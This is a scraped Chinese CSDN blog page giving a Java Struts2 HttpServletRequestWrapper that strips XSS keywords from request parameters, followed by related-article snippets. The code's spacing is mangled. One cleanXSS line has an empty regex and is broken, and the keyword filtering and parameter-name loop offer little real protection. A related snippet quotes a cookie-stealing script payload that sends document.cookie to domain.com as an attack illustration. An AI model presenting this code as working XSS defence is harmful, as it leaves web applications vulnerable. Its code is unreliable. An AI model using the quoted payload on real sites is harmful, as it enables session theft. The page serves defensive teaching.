java struts2防止xss_Struts网站基于Filter的XSS漏洞修复

最新推荐文章于 2023-04-13 17:47:57 发布
最新推荐文章于 2023-04-13 17:47:57 发布
阅读量252 收藏
点赞数
文章标签: java struts2防止xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33225892/article/details/114559675
版权

packagecom.ulic.ulcif.requestwrapper;importjava.util.Enumeration;importjava.util.Map;importjavax.servlet.http.HttpServletRequest;importorg.apache.struts2.dispatcher.StrutsRequestWrapper;importorg.springframework.util.CollectionUtils;/*** 写一个 Filter,使用 Filter 来过滤浏览器发出的请求。对每个 post 请求的参数过滤一些关键字,替换成安全的,例如:< > ' " \ / # & 。

*

* 方法:实现一个自定义的 HttpServletRequestWrapper,然后在 Filter 里面调用它,替换掉 getParameter 函数即可*/

public class XssHttpServletRequestWrapper extendsStrutsRequestWrapper {

HttpServletRequest orgRequest= null;publicXssHttpServletRequestWrapper(HttpServletRequest servletRequest) {super(servletRequest);

orgRequest=servletRequest;

}/*** 重写getParameterValues方法

* 通过循环取出每一个请求结果

* 再对请求结果进行过滤

**/

publicString[] getParameterValues(String parameter) {

String[] values= super.getParameterValues(parameter);if (values == null) {return null;

}int count =values.length;

String[] encodedValues= newString[count];for (int i = 0; i < count; i++) {

encodedValues[i]=cleanXSS(values[i]);

}returnencodedValues;

}/*** 重写getParameter方法

* 对请求结果进行过滤

**/

publicString getParameter(String parameter) {

String value= super.getParameter(parameter);if (value == null) {return null;

}returncleanXSS(value);

}publicString getHeader(String name) {

String value= super.getHeader(name);if (value == null)return null;returncleanXSS(value);

}/*** 获取最原始的request

*

*@return

*/

publicHttpServletRequest getOrgRequest() {returnorgRequest;

}/*** 获取最原始的request的静态方法

*

*@return

*/

public staticHttpServletRequest getOrgRequest(HttpServletRequest req) {if (req instanceofXssHttpServletRequestWrapper) {return((XssHttpServletRequestWrapper) req).getOrgRequest();

}returnreq;

}

@Overridepublic EnumerationgetParameterNames() {

Enumeration names = super.getParameterNames();while(names.hasMoreElements()){

String name=names.nextElement();

name=cleanXSS(name);

}returnnames;

}

@OverridepublicMap getParameterMap() {

Map paramMap= super.getParameterMap();if(CollectionUtils.isEmpty(paramMap)) {returnparamMap;

}for(Object value : paramMap.values()) {

String[] str=(String[])value;if (str != null) {for (int i = 0; i < str.length; i++) {

str[i]=cleanXSS(str[i]);

}

}

}returnparamMap;

}privateString cleanXSS(String value) {

value= value.replaceAll("", "& gt;");//先暂时去除 英文括号的拦截//value = value.replaceAll("\\(", "& #40;").replaceAll("\\)", "& #41;");

value = value.replaceAll("'", "& #39;");

value= value.replaceAll("eval\\((.*)\\)", "");

value= value.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']","\"\"");

value= value.replaceAll("script", "");

value= value.replaceAll("alert", "");returnvalue;

}

}

一只mikan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java struts2防止xss_拦截过滤防御XSS攻击 -- Struts2.3 以及 2.5 的解决方式
weixin_34481252的博客
02-13 647
使用Struts2框架开发的后台在防御XSS攻击的时候很多方式都不能用,因为Struts2对请求进行的二次封装有区别。以下针对Struts2的XSS攻击进行拦截过滤防御解决:Struts2.3本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。配置struts.xml:...此处省略n个actionJava代码,拦截器实现类:importjava.util.Map;importorg...
java struts2防止xss_GitHub - Xiang-do/Struts-S2-xxx: 整理收集Struts2漏洞环境
weixin_33978451的博客
02-16 566
Struts-S2-xxxStruts 漏洞2017年Struts被爆出的漏洞比以往多了很多,抽时间整理一下其中的环境以及POC和漏洞分析,学习一下其中的漏洞原理和分析,防御,以后如果再次爆发这样漏洞的时候,也能够自己试着分析一下,不用再去傻傻的等着了。S2-001 利用表单错误进行远程代码利用S2-002 标签 和 XSS漏洞S2-003 XWork ParameterInterceptors...
java struts2防止xss_JSP Struts过滤xss攻击的解决办法
weixin_42298802的博客
02-13 279
JSP Struts过滤xss攻击的解决办法本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。配置struts.xmlextends="struts-default, json-default">...此处省略n个actionJava代码,拦截器实现类import java.util.Map;import org.apache.commons.lang3.StringEsca...
struts2 预防xss攻击
weixin_42070436的博客
09-19 2145
struts2 预防xss攻击什么是XSS攻击举个例子代码 最近接触了一个比较老的项目用的ssh框架 甲方测试提出了这个xss漏洞 什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种...
Java Struts2系列的XSS漏洞(S2-002)
蚁景网安学院
03-06 471
漏洞简介:Struts2-002 是一个 XSS 漏洞,该漏洞发生在 s:url 和 s:a 标签中,当标签的属性 includeParams=all 时,即可触发该漏洞
防止常见XSS 过滤 SQL注入 JAVA过滤器filter
hithedy的专栏
02-03 2万+
1、首先配置web.xml,添加如下配置信息: xssAndSqlFilter com.cup.cms.web.framework.filter.XssAndSqlFilter xssAndSqlFilter * 2、编写过滤器   /** * */ package com.cup.cms.web.framework.filter; import java.io.I
结合struts2编写的通用过滤器filter
12-07
Struts2是一个强大的MVC框架,它为Java Web应用程序提供了模型-视图-控制器(MVC)架构。在这个框架中,过滤器(Filter)扮演着关键角色,它们负责在请求到达实际处理之前进行预处理,或者在响应发送给客户端之后...
struts2_src部分
08-22
在“struts2_src”部分,我们主要关注的是Struts2框架的源代码,这对于理解其内部工作原理、进行定制开发或调试是非常有价值的。 一、Struts2框架的核心组件和原理 1. FilterDispatcher:Struts2的核心控制器,它...
XSS HTMLFILTER
10-07
7. **兼容性**:作为一个Java工具,XSS HTMLFILTER可以轻松地与各种Java应用程序和框架集成,如Spring、Struts等,这为开发者提供了极大的便利。 在实际应用中,除了使用XSS HTMLFILTER,还需要结合其他安全措施,...
struts2配置 用户注册登录
05-28
Struts2是一个强大的MVC(模型-视图-控制器)框架,广泛应用于Java Web开发中。...在提供的`struts2_test`压缩包中,可能包含了实现这些功能的相关代码和配置文件,通过学习和研究,你可以更深入地理解Struts2的用法。
JSP Struts过滤xss攻击的解决办法
01-08
JSP Struts过滤xss攻击的解决办法 本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。 配置struts.xml <!-- 配置拦截器 --> <!-- 定义xss拦截器 -->
struts2漏洞解决
11-16
解决Struts2存在的重大后门BUG,并附带详细介绍文档
struts2通过过滤器拦截其漏洞配置方法
07-01
通过web配置拦截器进行struts2漏洞拦截源码及配置
struts2所需jar包
01-04
- Struts2的安全问题不容忽视,如XSS、CSRF等,开发者需要了解并应用安全最佳实践,例如使用过滤器防止恶意输入。 9. **测试**: - Struts2提供了JUnit测试支持,使得单元测试Action和拦截器变得更加方便。 以上...
基于Struts2修复XSS漏洞(博主验证有效)
weixin_42210904的博客
07-21 1465
--------------------------------------------------------XSSFilter --------------------------------------------------- package com.itcast.filter; import com.itcast.utils.XssRequestWrappers; import javax.servlet.*; import javax.servlet.http.HttpServletReq.
struts2】016/017漏洞XSS漏洞【亲测有效】
litlow的博客
04-13 320
struts升级到2.5.30详细步骤【pom.xml文件修改Jar版本】【框架版本升级】struts2-2.3.15升到2.5.30。基于Struts2修复XSS漏洞
struts2 过滤器
flyrainsky的专栏
12-23 8179
请求路径-action名称搜索顺序 1、获得请求路径的URI,例如url是:http://server/struts2/path1/path2/path3/test.action 2、首先寻找namespace为/path1/path2/path3的package,如果不存在这个 package则执行步骤3;如果存在这个package,则在这个package中寻找名字为test的actio
Struts2 Xss 攻击预防的处理
hello world!
12-15 2861
摘要: 关于XSS问题的处理,此前在博客 http://blog.csdn.net/catoop/article/details/50338259 中写过处理方法。刚好最近朋友有问到“在Struts2中按文章中那样处理无效”,后来验证了下发现,Struts2 对请求的二次封装有所不同,于是针对Struts. 关于XSS问题的处理,此前在博客 http://blog.csdn.net/ca
网站常用攻击技术详解
热门推荐
码上代码的博客
05-26 2万+
一、跨站脚本攻击 二、跨站请求伪造 三、SQL 注入攻击 四、拒绝服务攻击 参考资料 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会..
strutsstruts2防止xss的区别
最新发布
05-13
StrutsStruts2都可以通过采用一些安全措施来防止XSS攻击,但是它们在实现上有一些区别。 Struts1使用JSP作为视图层,因此可以在JSP页面中使用JSTL标签库的标签来输出HTML转义后的内容,从而避免XSS攻击。同时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值